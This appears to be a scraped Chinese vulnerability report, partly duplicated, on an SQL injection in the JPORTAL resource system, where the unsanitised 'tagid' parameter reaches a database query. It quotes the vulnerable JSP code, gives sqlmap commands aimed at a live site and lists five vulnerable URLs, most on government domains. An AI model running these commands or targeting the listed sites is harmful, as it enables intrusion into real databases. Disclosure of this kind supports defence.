### 简要描述: JPORTAL资源整合SQL注射漏洞三 ### 详细说明: 突然发现大汉网络的JPORTAL资源整合系统在一般应用里面,SO... 我来了 文件路径: /pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 部分代码为: ``` String tagid = Convert.getParameter(request,"tagid"); String tagname = Convert.getParameter(request,"tagname"); int isiteid= userEntity.getI_siteid(); int linages = 5; int nowpage = Convert.getParameterInt(request, "page", 1); String userid = Convert.getParameter(request,"userid"); String msg = ""; //全局参数 Pertool_UserThemesBLF userthemesblf = new Pertool_UserThemesBLF(); String themesid = userthemesblf.getUserThemes(""+userEntity.getI_id(),channelid,userEntity.getI_siteid()); StringBuffer strbuf_even = new StringBuffer(); //取得频道 Pertool_ResourceService resblf = new Pertool_ResourceService(); Pertool_ChannelBLF channelBLF = new Pertool_ChannelBLF(request); Pertool_ChannelEntity channelEntity = new Pertool_ChannelEntity(); channelEntity.setI_siteid(isiteid); channelEntity.setVc_userid(""+userEntity.getI_id());...
### 简要描述: JPORTAL资源整合SQL注射漏洞三 ### 详细说明: 突然发现大汉网络的JPORTAL资源整合系统在一般应用里面,SO... 我来了 文件路径: /pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 部分代码为: ``` String tagid = Convert.getParameter(request,"tagid"); String tagname = Convert.getParameter(request,"tagname"); int isiteid= userEntity.getI_siteid(); int linages = 5; int nowpage = Convert.getParameterInt(request, "page", 1); String userid = Convert.getParameter(request,"userid"); String msg = ""; //全局参数 Pertool_UserThemesBLF userthemesblf = new Pertool_UserThemesBLF(); String themesid = userthemesblf.getUserThemes(""+userEntity.getI_id(),channelid,userEntity.getI_siteid()); StringBuffer strbuf_even = new StringBuffer(); //取得频道 Pertool_ResourceService resblf = new Pertool_ResourceService(); Pertool_ChannelBLF channelBLF = new Pertool_ChannelBLF(request); Pertool_ChannelEntity channelEntity = new Pertool_ChannelEntity(); channelEntity.setI_siteid(isiteid); channelEntity.setVc_userid(""+userEntity.getI_id()); ArrayList<Pertool_ChannelEntity> al_channel = channelBLF.getChannelEntity(channelEntity); //取得与标签相关的资源 Pertool_ResourceDetail resdetail = new Pertool_ResourceDetail(); ArrayList<Pertool_ResourceEntity> all_resentity = resdetail.getResByTagId(tagid,linages,nowpage,isiteid,userid,channelid); ArrayList<Pertool_ResourceEntity> all_resEntityNum = resdetail.getResByTagId(tagid,0,0,isiteid,userid,channelid); Pertool_ResourceEntity resentity = null; String alltagName = ""; ArrayList<Pertool_TagEntity> allTagEntity = resdetail.getAllTags(tagid); ``` tagid进入getAllTags造成注入 sqlmap.py - "www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1" --dbms oracle [<img src="https://images.seebug.org/upload/201503/0323024404457aa17b6bbd5ba1f1c197bc2341c9.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0323024404457aa17b6bbd5ba1f1c197bc2341c9.jpg) sqlmap.py - "www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1" --dbms oracle --current-db [<img src="https://images.seebug.org/upload/201503/032303036991af581f5f62984c9cb98b0af04dac.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/032303036991af581f5f62984c9cb98b0af04dac.jpg) 5个案例: http://www.simt.com.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 http://inb.ningbo.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 http://portal.jinan.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 http://www.zj.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 http://pertool.sdds.gov.cn/pertool_subsite/resource/res_detail_list_ajax.jsp?tagid=1 ### 漏洞证明:
